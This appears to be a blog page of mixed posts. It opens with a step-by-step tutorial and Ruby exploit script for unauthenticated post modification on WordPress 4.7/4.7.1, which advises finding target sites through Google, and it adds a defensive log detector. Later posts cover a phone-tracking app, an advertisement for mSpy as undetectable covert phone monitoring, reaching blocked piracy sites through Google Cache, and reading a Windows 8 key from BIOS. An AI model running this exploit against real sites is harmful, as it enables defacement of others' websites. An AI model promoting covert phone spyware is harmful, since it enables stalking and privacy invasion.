WordPress REST API Exploit Step by Step

Vulnerability : Unauthenticated Page/Post Content Modification via REST API
Vulnerable WP Versions : 4.7 and 4.7.1
Vulnerability Description: If the website is not patched, the vulnerability allows an unauthenticated attacker to modify the content of any post or page on the WP site.

Patched Version : 4.7.2

Additional Info : The REST API was added in WP 4.4 (released in December 2015), but a plugin was needed to activate it. From WP 4.7 onward no plugin is needed; the API is enabled by default. This vulnerability is specific to the REST API, so 4.7.0 and 4.7.1 are directly affected because the API is enabled by default there.


In this demonstration we show the exact steps to exploit WordPress websites running the vulnerable versions 4.7 and 4.7.1. The tool I am using here is the Advanced REST Client Chrome add-on.


STEP 1: Find a Website Running WordPress

Google is your door: searching for something similar to this, I got my hands on plenty of WP websites.

However, we are not going to try this on any of those websites; of course I do not want to trouble someone or get into trouble myself. I am going to demonstrate on my local WordPress install. This is the page whose content we are going to change without any authorization.


STEP 2: Find a Vulnerable WordPress Site

View the page source of the website to identify the running WP version. If the version is either 4.7 or 4.7.1, the website is vulnerable and you can proceed further.


STEP 3: Identify WP Post ID

Each post in WP is associated with a unique post ID, which is its reference. You can look it up with the REST API client. Here 3 is the post ID of the page shown in STEP 1.


STEP 4: Execute Now

Put your post ID in the API link. Here I gave my post ID 3 as ?id=3ABC.

And we got the website hacked!


Alternatively, you can use the following exploit code:

require 'rest-client'
require 'json'

puts "Enter Target URI (With wp directory)"
targeturi = gets.chomp
puts "Enter Post ID"
postid = gets.chomp.to_i

# POST to the WP REST API posts endpoint. The id in the JSON body carries a
# non-numeric suffix (the same trick as ?id=3ABC above) while the title and
# content are replaced.
response = RestClient.post(
  "#{targeturi}/index.php/wp-json/wp/v2/posts/#{postid}",
  {
    "id"      => "#{postid}justrawdata",
    "title"   => "You have been hacked",
    "content" => "Hacked please update your wordpress version"
  }.to_json,
  :content_type => :json,
  :accept       => :json
) { |response, request, result| response }   # return the response instead of raising on non-2xx codes

if response.code == 200
  puts "Done! '#{targeturi}/index.php?p=#{postid}'"
else
  puts "This site is not Vulnerable"
end

source: exploit-db
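For the defending side, here is an added example that is not part of the original post or of the exploit-db script. It does two things a site owner would want after reading the above: a triage check that tells whether a reported WordPress version is one of the two affected releases named here (4.7 and 4.7.1), and a detector that runs over web-server access-log lines and flags writes to /wp/v2/posts/<n> whose query-string id does not strictly parse to the route's post number (the ?id=3ABC pattern). The strict parser also shows the property the trick relies on: a lenient parse turns "3ABC" into 3, while a strict one rejects it outright, so code paths using different parses disagree about which post is meant. The log lines, IP addresses and paths are constructed for this demonstration; the combined log format is the standard Apache/nginx one.

```ruby
# Added example, not part of the original post or the exploit-db script:
# defender-side checks for the WP 4.7 / 4.7.1 REST API issue described above.
# The log lines below are constructed for this demonstration; the IPs and
# paths are hypothetical.
require 'cgi'

AFFECTED_WP_VERSIONS = %w[4.7 4.7.1].freeze

# True when a site's reported WordPress version is one of the affected releases
# named on the page (4.7 and 4.7.1; 4.7.2 carries the fix).
def affected_wp_version?(version)
  AFFECTED_WP_VERSIONS.include?(version.to_s.strip)
end

# Strict post-id parsing: only a string made entirely of digits is accepted.
# A lenient parse ("3ABC".to_i == 3) lets one code path see post 3 while a
# stricter check elsewhere sees "not a number"; that disagreement is what
# the ?id=3ABC trick relies on. Returns nil for anything non-numeric.
def strict_post_id(value)
  return nil unless value.is_a?(String) && value.match?(/\A\d+\z/)
  value.to_i
end

# Constructed Apache/nginx "combined" format access-log lines.
SAMPLE_LOG = <<~LOG
  203.0.113.5 - - [10/Feb/2017:10:01:12 +0000] "GET /index.php/wp-json/wp/v2/posts/3 HTTP/1.1" 200 1532 "-" "curl/7.50.1"
  203.0.113.5 - - [10/Feb/2017:10:01:15 +0000] "POST /index.php/wp-json/wp/v2/posts/3?id=3ABC HTTP/1.1" 200 1601 "-" "Mozilla/5.0"
  198.51.100.7 - - [10/Feb/2017:10:02:40 +0000] "POST /wp-json/wp/v2/posts/12?id=12 HTTP/1.1" 401 87 "-" "Mozilla/5.0"
  198.51.100.9 - - [10/Feb/2017:10:03:01 +0000] "GET /wp-json/wp/v2/posts?per_page=5 HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
LOG

LOG_LINE_RE    = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<target>\S+) [^"]*" (?<status>\d{3})/
POSTS_ROUTE_RE = %r{/wp-json/wp/v2/posts/(?<route_id>\d+)\z}

# Parses one combined-format line into a hash, or returns nil if it does not
# match. Query-string parameters are split out so an id override is visible.
def parse_log_line(line)
  m = LOG_LINE_RE.match(line)
  return nil unless m
  path, _sep, query = m[:target].partition('?')
  params = query.empty? ? {} : CGI.parse(query)
  { ip: m[:ip], time: m[:time], method: m[:method], path: path,
    params: params, status: m[:status].to_i }
end

# Exploit signature: a write to /wp/v2/posts/<n> whose query-string id does
# not strictly parse to the same integer as the route id. An id sent only in
# the JSON body is not visible in an access log; that case needs a WAF or an
# application-level log instead.
def suspicious_post_update?(entry)
  return false unless %w[POST PUT PATCH].include?(entry[:method])
  route = POSTS_ROUTE_RE.match(entry[:path])
  return false unless route
  entry[:params].fetch('id', []).any? { |v| strict_post_id(v) != route[:route_id].to_i }
end

# Runs the detection over a whole log text and returns the flagged entries.
def flag_suspicious_requests(log_text)
  log_text.each_line.map { |l| parse_log_line(l.chomp) }.compact
          .select { |e| suspicious_post_update?(e) }
end

if __FILE__ == $PROGRAM_NAME
  flag_suspicious_requests(SAMPLE_LOG).each do |e|
    puts "#{e[:time]} #{e[:ip]} #{e[:method]} #{e[:path]} id=#{e[:params]['id'].inspect}"
  end
end
```

Run against the constructed log, only the second line is flagged: it is a POST to post 3 carrying id=3ABC. The third line, a POST whose id matches the route, is left alone, as are the GET requests. For a real site, feed the function your access log and, separately, apply the same strict digits-only rule in any WAF rule you write for the posts endpoint.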

Track your lost Android mobile phone – XtraSEC free android security

Today I found a fantastic piece of software to track your lost phone, and it is free! There is a commercial version, but you can still perform most of the tasks with the free version: XtraSEC.


Step 1: Use the Login button on the XtraSEC website to register your Gmail account.

Step 2: Install the XtraSEC app on your Android phone.

Step 3: Log in to the app with the registered Gmail account, provide an alternate mobile phone number and grant the necessary permissions. (The alternate number is needed to send commands to your lost phone via SMS.)

Step 4: Create a PIN so that nobody can change the app's settings if your phone is stolen.

I was amazed when I read all the features XtraSEC provides:

  • Get your phone's location and display it in Google Maps.
  • Remotely capture a photo with your phone's camera, using either the front or the back camera. The captured photo is sent to your registered email address.
  • Remotely turn Wi-Fi and 3G on or off.
  • Remotely wipe the phone and memory card data.
  • Phone capture

SMS Commands List

mSpy – track mobile phone calls, text messages and many more

mSpy – you can remotely track all activity that takes place on the monitored phone, from calls to calendar updates. Call history, text messages, emails, call recordings… all immediately sent from the tracked phone right to your secure online account! mSpy claims that they are 100% undetectable. Read more

You can look at the compatible phone models – Android, iOS and Blackberry



Easy way to access blocked websites

You are probably familiar with Google Cache. If not, a two-line description explains it well.

Google takes a snapshot of each page it crawls and caches that version on its servers. This cached copy (Google Cache) is what Google uses to decide whether the website is relevant to your search query.

So if a website is blocked by your ISP because of local law enforcement, you can still reach it through the Google Cache option. Let's look at it.

In the country where I am currently living, piratesbay-torrents are blocked.

website blocked

In order to access such a blocked website, instead of browsing directly to thepiratebay.sx, choose the 'Cached' option in the drop-down menu next to the result in Google Search.


Google Cache


So with the help of Google Cache I can now view the contents of The Pirate Bay, even though the ISP blocks it.

Google Cache Website

An alternative is to use a Google Cache tool. One of the easiest is cache.nevkontakte.com, which actually serves you results from Google Cache.

Enjoy accessing blocked websites!

Retrieve Windows 8 Key encrypted in BIOS

Microsoft has moved the Windows 8 OEM product key into the BIOS. Product keys are no longer on a sticker on the computer; you will only see a Windows 8 logo sticker and nothing else. So if you reinstall Windows 8 there is no need to hunt for the key: the installation picks it up from the BIOS automatically, provided you install the same edition of Windows 8 OEM that came with the laptop.

So how do you retrieve the key from the BIOS?

1. Download the 32- or 64-bit version of RWEverything.

2. Click ACPI and then MSDM to view the key embedded in the BIOS.

RWEverything
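The MSDM entry that RWEverything shows in step 2 is a small ACPI table, and it is worth seeing what a tool actually checks before trusting the string it displays. The following is an added example, not code from the original post or from RWEverything: it builds an MSDM-shaped table in memory with an obvious placeholder key (constructed data, not a dump of a real machine), then parses it the way a firmware tool would, validating the signature, the length field and the ACPI checksum before extracting the key. The layout assumed is the one Microsoft documents for the OA 3.0 MSDM table: the 36-byte standard ACPI header, five little-endian 32-bit fields (version, reserved, data type, data reserved, data length) and then the 29-byte key string. On Linux the same raw bytes are exposed at /sys/firmware/acpi/tables/MSDM (a real kernel path, readable as root), which the optional helper at the end reads.

```ruby
# Added example, not part of the original post or of RWEverything: parse a raw
# ACPI MSDM table and extract the embedded OEM key.
# Assumed layout (Microsoft OA 3.0 MSDM table): 36-byte standard ACPI header,
# then five little-endian 32-bit fields (version, reserved, data type, data
# reserved, data length), then the 29-byte key string. The table built here is
# constructed test data with a placeholder key, not a real firmware dump.

ACPI_HEADER_LEN = 36
MSDM_BODY_LEN   = 20
MSDM_KEY_LEN    = 29   # 25 key characters plus four dashes
CHECKSUM_OFFSET = 9    # checksum byte of the ACPI header

# Builds an MSDM-shaped table carrying +key+ (constructed data for the demo).
def build_msdm_table(key)
  raise ArgumentError, "key must be #{MSDM_KEY_LEN} bytes" unless key.bytesize == MSDM_KEY_LEN
  total = ACPI_HEADER_LEN + MSDM_BODY_LEN + MSDM_KEY_LEN
  # signature, length, revision, checksum (patched below), OEM id, OEM table id,
  # OEM revision, creator id, creator revision
  header = ['MSDM', total, 3, 0, 'EXAMPL', 'EXAMPLE1', 1, 'EXMP', 1].pack('a4VCCa6a8Va4V')
  # version, reserved, data type, data reserved, data length
  body  = [1, 0, 1, 0, MSDM_KEY_LEN].pack('V5')
  table = header + body + key.b
  # ACPI checksum rule: every byte of the table summed modulo 256 must be zero.
  table.setbyte(CHECKSUM_OFFSET, (256 - table.bytes.sum % 256) % 256)
  table
end

# Parses an MSDM table and returns { version:, data_type:, key: }.
# Raises on a wrong signature, a length field that disagrees with the data,
# a bad checksum, or a data length that runs past the end of the table.
def parse_msdm_table(table)
  table = table.b
  raise 'too short for an MSDM table' if table.bytesize < ACPI_HEADER_LEN + MSDM_BODY_LEN
  signature, length = table.unpack('a4V')
  raise "not an MSDM table (signature #{signature.inspect})" unless signature == 'MSDM'
  raise "length field #{length} does not match #{table.bytesize} bytes" unless length == table.bytesize
  raise 'ACPI checksum mismatch' unless (table.bytes.sum % 256).zero?
  version, _reserved, data_type, _data_reserved, data_length =
    table.byteslice(ACPI_HEADER_LEN, MSDM_BODY_LEN).unpack('V5')
  data_start = ACPI_HEADER_LEN + MSDM_BODY_LEN
  raise 'data length runs past end of table' if data_start + data_length > table.bytesize
  key = table.byteslice(data_start, data_length).force_encoding('US-ASCII')
  { version: version, data_type: data_type, key: key }
end

# On Linux the kernel exposes the raw table at this path (root needed).
# Returns nil where it is absent: no OEM key, non-Linux host, or no privilege.
def read_msdm_from_sysfs(path = '/sys/firmware/acpi/tables/MSDM')
  File.binread(path)
rescue SystemCallError
  nil
end

if __FILE__ == $PROGRAM_NAME
  # Demo runs on the constructed table; swap in read_msdm_from_sysfs on Linux.
  demo = build_msdm_table('XXXXX-XXXXX-XXXXX-XXXXX-XXXXX')
  puts parse_msdm_table(demo)[:key]
end
```

The checksum check matters more than it looks: a table that fails it is either corrupt or was not produced by the firmware, so a tool that skips the check can happily print 29 bytes of garbage as a "key". Flipping any single bit of the constructed table makes the parser refuse it.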